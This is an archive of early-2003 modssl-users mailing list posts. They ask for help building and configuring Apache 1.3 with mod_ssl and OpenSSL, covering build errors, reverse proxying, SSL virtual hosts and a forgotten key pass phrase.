Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 18 Feb 2003 12:36:40 -0800
Received: from 168.179.102.118 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Tue, 18 Feb 2003 20:36:40 GMT
X-Originating-IP: [168.179.102.118]
From: "Manu Kits" 
To: modssl-users@modssl.org, openssl-users@openssl.org
Subject: Apache Config Errors with SSL
Date: Tue, 18 Feb 2003 20:36:40 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Feb 2003 20:36:40.0694 (UTC) FILETIME=[710EA160:01C2D78D]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manu Kits" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi:

I am using IBM AIX System and installed OPENSSL with following oprions:
--------------------------------------------------------------------------------------
./configure --prefix=/usr/local --openssldir=/usr/local/openssl
--------------------------------------------------------------------------------------

Later I installed MOD_SSL as follows:
--------------------------------------------------------------------------------------
./configure --with-apache=/usr/src/apache1326
--------------------------------------------------------------------------------------

Now, when I install my APACHE 1.3.26 as follows, I get ERRORS:
--------------------------------------------------------------------------------------
#cd /usr/src/apache1326
#export SSL_BASE=/usr/local/openssl
#./configure --with-layout=Apache --prefix=/usr/local/apache1326 
--enable-module=so --enable-module=ssl --enable-shared=ssl

ERROR: Cannot find SSL Binaries under /usr/local/openssl

--------------------------------------------------------------------------------------

Does anyone there now what WORNG am I doing...? Where should my SSL_BASE 
point to?

THANKS!

_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*.  
http://join.msn.com/?page=features/featuredemail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:46:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3B90A2AA03C; Sun, 23 Feb 2003 12:46:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 5F0752AA03B; Sun, 23 Feb 2003 12:46:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from u1snd02p.us.fortis.com (smtp02p.us.fortis.com [167.79.54.8])
	by master.modssl.org (Postfix) with ESMTP id 094262AA017
	for ; Wed, 19 Feb 2003 10:41:35 +0100 (CET)
Received: from W1PMM02.us.fortis.com (W1PMM02.us.fortis.com [165.245.9.58])
	by u1snd02p.us.fortis.com (8.11.6+Sun/8.11.6) with ESMTP id h1EG8Y815318
	for ; Fri, 14 Feb 2003 10:08:49 -0600 (CST)
Received: from internal.us.fortis.com (Not Verified[165.245.4.198]) by W1PMM02.us.fortis.com with MailMarshal (v5,0,3,71)
	id ; Fri, 14 Feb 2003 10:08:33 -0600
Received: from FITGATE1-Message_Server by internal.us.fortis.com
	with Novell_GroupWise; Fri, 14 Feb 2003 10:08:33 -0600
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Fri, 14 Feb 2003 10:08:11 -0600
From: "Judd Brown" 
To: 
Subject: mod_ssl with Apache reverse proxy
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=_9EC1E091.B1D1BA0C"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Judd Brown" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--=_9EC1E091.B1D1BA0C
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable

I am trying to set up an SSL connection between client, Apache 1.3.19, an=
d NT backend.

I want to go SSL to the Proxy, then reverse proxy via SSL to the backend.=


The ProxyPass is:


ProxyPass  /mail/   https://webmail.foo.com/mail/
ProxyPassReverse  /mail/   https://webmail.foo.com/mail/

The error I get is:

Proxy Error
The proxy server received an invalid response from an upstream server.=20
The proxy server could not handle the request GET /.=20
Reason: SSL proxy connect failed (www.snakeoil.dom:443): peer webmail.for=
tisfamily.com:443: (null)

Any hints would be appreciated.
Thanks,
jb

****************************************************************
=09		Please Note
The information in this E-mail message is legally privileged
and confidential information intended only for the use of the
individual(s) named above. If you, the reader of this message,
are not the intended recipient, you are hereby notified that=20
you should not further disseminate, distribute, or forward this
E-mail message. If you have received this E-mail in error,
please notify the sender. Thank you
*****************************************************************

--=_9EC1E091.B1D1BA0C
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Description: HTML







I am trying to set up an SSL connection between clien=
t, Apache=20
1.3.19, and NT backend.


 


I want to go SSL to the Proxy, then reverse proxy via=
=20SSL to=20
the backend.


 


The ProxyPass is:


 


 




ProxyPass  /mail/   https://webmail.foo.com/mail/<=
/FONT>




ProxyPassReverse  /mail/   https://webmail.foo.com/mail/<=
/FONT>


 


The error I get is:


 




Proxy Error
The proxy server received an in=
valid=20
response from an upstream server.=20

The proxy server could not handle the request GET /.=20

Reason: SSL proxy connect failed (www.snakeoil.dom:443): peer =

webmail.fortisfamily.com:443: (null)


 


Any hints would be appreciated.


Thanks,


jb





Please Note
T=
he=20
information in this E-mail message is legally privileged
and confident=
ial=20
information intended only for the use of the
individual(s) named above=
. If=20
you, the reader of this message,
are not the intended recipient, you a=
re=20
hereby notified that 
you should not further disseminate, distribute, =
or=20
forward this
E-mail message. If you have received this E-mail in=20
error,
please notify the sender. Thank you









--=_9EC1E091.B1D1BA0C--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:46:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 11C2A2AA039; Sun, 23 Feb 2003 12:46:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id A17F82AA023; Sun, 23 Feb 2003 12:46:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from powerweb.net (mail.powerweb.net [64.118.32.23])
	by master.modssl.org (Postfix) with ESMTP id 01E842AA000
	for ; Wed, 19 Feb 2003 10:42:32 +0100 (CET)
Received: from [64.118.32.89] (HELO there)
  by powerweb.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 34075245 for modssl-users@modssl.org; Tue, 18 Feb 2003 17:23:48 -0600
Content-Type: text/plain;
  charset="iso-8859-1"
From: Ray a PowerWeb Tech 
Organization: PowerWeb Connect
To: modssl-users@modssl.org
Subject: mass ip virtual host & mod_ssl?
Date: Tue, 18 Feb 2003 17:09:38 -0600
X-Mailer: KMail [version 1.3.2]
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ray a PowerWeb Tech 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

is it possible using either mod_rewrite, mod_vhosts_alias or some trick i=
n=20
mod_ssl to have multiple virtual hosts by ip address

was thinking something like=20
# get the server name from the Host: header
UseCanonicalName Off

# this log format can be split per-virtual-host based on the first field
LogFormat "%V %h %l %u %t \"%r\" %s %b" vcommon
CustomLog logs/access_log vcommon

# include the server name in the filenames used to satisfy requests
VirtualDocumentRoot /www/hosts/%0/docs
VirtualScriptAlias  /www/hosts/%0/cgi-bin

as per=20
http://httpd.apache.org/docs/vhosts/mass.html#ipbased

but some of the domains have SSL, and it doesn't seem like this will cove=
r it=20
as is.  how do i setup a folder for keys that will be used?
ie /www/certs/%0.key
or does it automagicly pick the correct key for the ip/domain?


--=20
Eternity is a terrible thought.  I mean, where's it going to end?
=09=09-- Tom Stoppard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:46:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5DC712AA041; Sun, 23 Feb 2003 12:46:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 0D7B82AA03E; Sun, 23 Feb 2003 12:46:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from hotmail.com (f61.sea1.hotmail.com [207.68.163.61])
	by master.modssl.org (Postfix) with ESMTP id 69CEA2AA002
	for ; Wed, 19 Feb 2003 10:45:03 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 18 Feb 2003 08:00:00 -0800
Received: from 168.179.102.118 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Tue, 18 Feb 2003 16:00:00 GMT
X-Originating-IP: [168.179.102.118]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: Apache+Tomcat with SSL?
Date: Tue, 18 Feb 2003 16:00:00 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Feb 2003 16:00:00.0387 (UTC) FILETIME=[CA80CD30:01C2D766]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi:

I am using Apache 1.3.26 with JBoss ... it is working fine.

Now I have installed SSL Certificates on my Servers and wondering how to 
configure Apache for SSL?
Should I install mod_ssl or Apache-SSL? Are both these same ? which one is 
recommended?

Thanks!






_________________________________________________________________
The new MSN 8: smart spam protection and 2 months FREE*  
http://join.msn.com/?page=features/junkmail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:47:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5770F2AA039; Sun, 23 Feb 2003 12:47:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id D03282AA034; Sun, 23 Feb 2003 12:47:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id D43A62AA000
	for ; Wed, 19 Feb 2003 11:26:20 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h1HFLN112188
	for ; Mon, 17 Feb 2003 15:21:28 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <1TVXD657>; Mon, 17 Feb 2003 15:14:53 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F26D7@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: What happened to http://www.modssl.org/contrib
Date: Mon, 17 Feb 2003 15:14:43 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is what I see when I access http://www.modssl.org/contrib/index.phtml

) {
   s|\s*\n$||;
   push(@HI, $_);
}
close(FP);
sub ls {
    my ($pat) = @_;
    my (@F, @R, $f, @S, @T);
    @F = sort(glob($pat));
    @R = ();
    foreach $f (@F) {
        next if ($f =~ m|^index.*|);
        @S = stat($f);
        $f = "$f/" if (-d $f);
        @T = localtime($S[9]);
        my @moy = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec');
        push(@R, sprintf("%"."8d %"."s %"."2d %"."02d:%"."02d:%"."02d %"."d
%"."s\n",
             $S[7], $moy[$T[4]], $T[3], $T[2], $T[1], $T[0], 1900+$T[5],
$f));
    }
    return @R;
}
chdir("../../ftp/contrib/");
@L = &ls("*");
foreach $l (@L) {
    next if ($l =~ m|^\s*$|);
    $l =~ s|(\s+)(\S+[^/])(\s*\n)$|$1."$2".$3|e;
    $l =~ s|(\s+)(\S+/)(\s*\n)$|$1."$2".$3|e;
    foreach $hi (@HI) {
        $l =~ s|^(.*$hi.*)$|$1  [LATEST]|;
        $l =~ s|>($hi)<|>$1<|;
    }
    print $l;
}
!>

Is something broken? The contrib part is no longer linked to from the top
level http://www.modssl.org either.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

A fundamentalist - what you call someone more sure of what they believe than
what you are


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:48:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 440602AA036; Sun, 23 Feb 2003 12:48:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id DF8FD2AA026; Sun, 23 Feb 2003 12:48:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from mailhub.dfrc.nasa.gov (mailhub.dfrc.nasa.gov [130.134.81.12])
	by master.modssl.org (Postfix) with ESMTP id 3F0332AA000
	for ; Wed, 19 Feb 2003 20:27:57 +0100 (CET)
Received: from mail.dfrc.nasa.gov by mailhub.dfrc.nasa.gov with ESMTP for modssl-users@modssl.org; Wed, 19 Feb 2003 11:26:13 -0800
Received: from mail.dfrc.nasa.gov (plutarch.dfrc.nasa.gov [130.134.64.20])
          by mail.dfrc.nasa.gov (Post.Office MTA v3.5.3 release 223
          ID# 0-71686U2500L200S0V35) with ESMTP id gov
          for ; Wed, 19 Feb 2003 11:27:52 -0800
Message-Id: <3E53DAB6.806F4789@mail.dfrc.nasa.gov>
Date: Wed, 19 Feb 2003 11:27:50 -0800
From: Ronald Rough 
X-Mailer: Mozilla 4.75 [en] (X11; U; SunOS 5.6 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Why does RSA webagent5.1 not work with Apache 1.3.27
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ronald Rough 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache Version / RSA Secure ID question:

Why is RSA WebAgent5.1 not supported
with Apache 1.3.27 and mod_ssl-2.8.12-1.3.27
(had to use Apache 1.3.26 not 1.3.27)?

I would like fo get the technical reason for
this. I know of someone who installed the
WebAgent.tar file from your web site and
it worked with the latest versions of
Apache and mod_ssl.

I am worried that I might be using the
Web Agent in incorrect manner.

Thanks for your help with this issure,

Ron

--
*******************************************
Ron Rough
Arcata Associates
Systems Administrator
Department 311
Dryden Flight Research Center
Phone: (661) 276-7513
Fax: (661) 276-3462
*******************************************


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:48:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 123312AA041; Sun, 23 Feb 2003 12:48:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id C562F2AA034; Sun, 23 Feb 2003 12:48:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from mail.pirk.com (node-423a4b7a.sna.onnet.us.uu.net [66.58.75.122])
	by master.modssl.org (Postfix) with ESMTP id 368D22AA002
	for ; Wed, 19 Feb 2003 23:31:05 +0100 (CET)
Received: from mail.pirk.com (IDENT:1000@localhost [127.0.0.1])
	by mail.pirk.com (8.12.4/8.12.0.Beta19) with ESMTP id h1JMV27J019248;
	Wed, 19 Feb 2003 14:31:02 -0800
Received: from localhost (orion@localhost)
	by mail.pirk.com (8.12.4/8.12.0.Beta19/Submit) with ESMTP id h1JMV1wO019237;
	Wed, 19 Feb 2003 14:31:01 -0800
X-Authentication-Warning: mail.pirk.com: orion owned process doing -bs
Date: Wed, 19 Feb 2003 14:31:01 -0800 (PST)
From: Steve Pirk 
X-X-Sender: orion@mail.pirk.com
To: "R. DuFresne" 
Cc: modssl-users@modssl.org
Subject: Re: Multiple SSL VirtualHosts in apache
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Pirk 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yeah, we had it slightly misconfigured. Now that I think
about it, I cannot remember the exact fix. I will look
over the httpd.conf file.

Thanks!
--
Steve (egrep)

On Wed, 19 Feb 2003, R. DuFresne wrote:

>
> The error you posted from logs implies the request the server is getting
> is http rather then https, perhaps your  redirect or rewrite is not
> functioning properly?
>
> Thanks,
>
> Ron DuFresne
>
> On Wed, 5 Feb 2003, Steve Pirk wrote:
>
> > I check the mail archives, but could not find a good
> > answer for this "problem" I am having.
> >
> > I am building out a dev environment using apache
> > on Solaris. The dev environment needs to run under
> > SSL (to simulate the production environment). I am
> > starting with 4 virtual servers. They all use the
> > same cert file, but are on different ports.
> >
> > The problem I am running into is that only the "first"
> > VirtualHost works. Requests to subsequent ports result
> > in a mod_ssl:error:HTTP-request error. Here is the error_log
> > entry:
> >
> > [Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL handshake failed: HTTP
> > spoken on HTTPS port; trying to send HTML error page (OpenSSL library
> > error follows)
> > [Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
> > routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking HTTP to HTTPS
> > port!?]
> >
> > This is being used in conjunction with an auth package,
> > but the redirect after logging in is https://
> >
> > Does anyone knnow of a good way to have multiple
> > SSL virtual servers on one apache instance?
> >
> > Here is a sample of httpd.conf. In this case, port 7000
> > works, but 7001 and 7002 get the mod_ssl error.
> >
> >   
> >     DocumentRoot        /some/doc/root
> >     SSLEngine on
> >     SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >     SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >   
> >
> >   
> >     DocumentRoot        /some/doc/root
> >     SSLEngine on
> >     SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >     SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >   
> >
> >   
> >     DocumentRoot        /some/doc/root
> >     SSLEngine on
> >     SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >     SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >   
> >
> > --
> > Steve (egrep)
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
>
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
>
> testing, only testing, and damn good at it too!
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:49:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C7942AA048; Sun, 23 Feb 2003 12:49:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 3D30B2AA046; Sun, 23 Feb 2003 12:49:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from sb942.web2010.com (sb942.hostcentric.net [216.157.92.254])
	by master.modssl.org (Postfix) with ESMTP id 4B3E42AA019
	for ; Thu, 20 Feb 2003 12:19:35 +0100 (CET)
Received: from moose (pc-4-66.scpe.townisp.com [216.195.4.66])
	by sb942.web2010.com (8.10.1/8.9.0) with SMTP id h1KBCh325692
	for ; Thu, 20 Feb 2003 06:12:59 -0500 (EST)
Message-ID: <27b801c2d8d1$9e962640$2f01a8c0@gemweb.net>
From: "Glenn E. May" 
To: 
Subject: SSL Pass Phrase
Date: Thu, 20 Feb 2003 06:16:54 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_27B5_01C2D8A7.AA4B6100"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Glenn E. May" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_27B5_01C2D8A7.AA4B6100
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hey all,

I recently installed mod-ssl on a new web server. Unfortunately, in my =
haste to get the machine up and running, I cannot remember the pass =
phrase that I used.=20


I have tried making a de-install, and re-installing, however I am unable =
to bypass this.=20


Can someone please let me know the best way to do this.=20



Thanks
Glenn May


------=_NextPart_000_27B5_01C2D8A7.AA4B6100
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hey all,


 


I recently installed mod-ssl on a new web server.=20
Unfortunately, in my haste to get the machine up and running, I cannot =
remember=20
the pass phrase that I used. 


 


 


I have tried making a de-install, and re-installing, =
however I=20
am unable to bypass this. 


 


 


Can someone please let me know the best way to do =
this.=20



 


 


 


Thanks


Glenn May


 


------=_NextPart_000_27B5_01C2D8A7.AA4B6100--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:49:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EE7FB2AA036; Sun, 23 Feb 2003 12:49:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 979A32AA026; Sun, 23 Feb 2003 12:49:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from gtsmail.garbertravel.com (Mail.GarberTravel.com [216.195.196.83])
	by master.modssl.org (Postfix) with ESMTP id 807782AA019
	for ; Thu, 20 Feb 2003 18:09:17 +0100 (CET)
Received: by gtsmail.garbertravel.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Feb 2003 12:02:20 -0500
Message-ID: <1DD600807E50D511864400B0D0D0278703BE9A10@gtsmail.garbertravel.com>
From: "Fitzmaurice, James" 
To: "'modssl-users@modssl.org'" 
Subject: Newbie - Please help! configure mod_ssl for Apache on SCO
Date: Thu, 20 Feb 2003 12:02:12 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fitzmaurice, James" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Please help! I've been attempting to compile mod_ssl 2.8.9 for apache 1.3.26
and keep running into either environment issues or version problems on SCO
OpenServer 5.05

I need to apply a Verisign Cert on our Apache Web Server. I installed
OpenSSL
and was able to generate a Cert. Now I need to apply the Cert and Apache is
not
yet SSL enabled. Below is the ouput I get when I run configure and below
that is 
the output of the config.log. Where am I going wrong? I would really
appreciate some
help with this as I am new at Unix Admin stuff.

Thanks!

Jim Fitzmaurice
Systems Administrator
Garber Travel
JFitzmaurice@GarberTravel.com


# ./configure --with-apache=/usr/local/lib/apache_1.3.26
--prefix=/usr/local/lib
/apache
Configuring mod_ssl/2.8.9 for Apache/1.3.26
 + Apache location: /usr/local/lib/apache_1.3.26 (Version 1.3.26)
 + Auxiliary patch tool: ./etc/patch/patch (local)
./configure:Error: Building of 'patch' tool failed:
-------------------------------------------------
x patch/rename.c, 1323 bytes, 3 tape blocks
x patch/util.c, 9365 bytes, 19 tape blocks
x patch/util.h, 2325 bytes, 5 tape blocks
x patch/version.c, 280 bytes, 1 tape blocks
x patch/version.h, 25 bytes, 1 tape blocks
creating cache ./config.cache
checking for gcc... gcc
checking whether the C compiler (gcc  ) works... no
configure: error: installation or configuration problem: C compiler cannot
creat
e executables.
make: *** No targets specified and no makefile found.  Stop.
-------------------------------------------------
Hint: Either try to build 'patch' under etc/patch/
Hint: manually and re-run this 'configure' script
Hint: or provide us the path to your vendor 'patch'
Hint: program via the --with-patch=FILE option (but
Hint: expect perhaps failures when applying patches!)

# cat config.log
tar: blocksize = 20
x patch/.cvsignore, 62 bytes, 1 tape blocks
x patch/COPYING, 17982 bytes, 36 tape blocks
x patch/EXTERN.h, 133 bytes, 1 tape blocks
x patch/INTERN.h, 110 bytes, 1 tape blocks
x patch/Makefile.in, 755 bytes, 2 tape blocks
x patch/README, 63 bytes, 1 tape blocks
x patch/backupfile.c, 9814 bytes, 20 tape blocks
x patch/backupfile.h, 1467 bytes, 3 tape blocks
x patch/common.h, 4291 bytes, 9 tape blocks
x patch/config.h.in, 2228 bytes, 5 tape blocks
x patch/configure, 53417 bytes, 105 tape blocks
x patch/configure.in, 420 bytes, 1 tape blocks
x patch/getopt.c, 34801 bytes, 68 tape blocks
x patch/getopt.h, 4651 bytes, 10 tape blocks
x patch/inp.c, 9636 bytes, 19 tape blocks
x patch/inp.h, 321 bytes, 1 tape blocks
x patch/patch.c, 20215 bytes, 40 tape blocks
x patch/patchlevel.h, 28 bytes, 1 tape blocks
x patch/pch.c, 31988 bytes, 63 tape blocks
x patch/pch.h, 548 bytes, 2 tape blocks
x patch/rename.c, 1323 bytes, 3 tape blocks
x patch/util.c, 9365 bytes, 19 tape blocks
x patch/util.h, 2325 bytes, 5 tape blocks
x patch/version.c, 280 bytes, 1 tape blocks
x patch/version.h, 25 bytes, 1 tape blocks
creating cache ./config.cache
checking for gcc... gcc
checking whether the C compiler (gcc  ) works... no
configure: error: installation or configuration problem: C compiler cannot
creat
e executables.
make: *** No targets specified and no makefile found.  Stop. 

My environment conatins the following:
CC=gcc
GCC_EXEC_PREFIX=:/usr/local/lib/gcc-lib/i386-pc-sco3.2v5.0.5/2.95.2
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:49:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EB8952AA03C; Sun, 23 Feb 2003 12:49:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
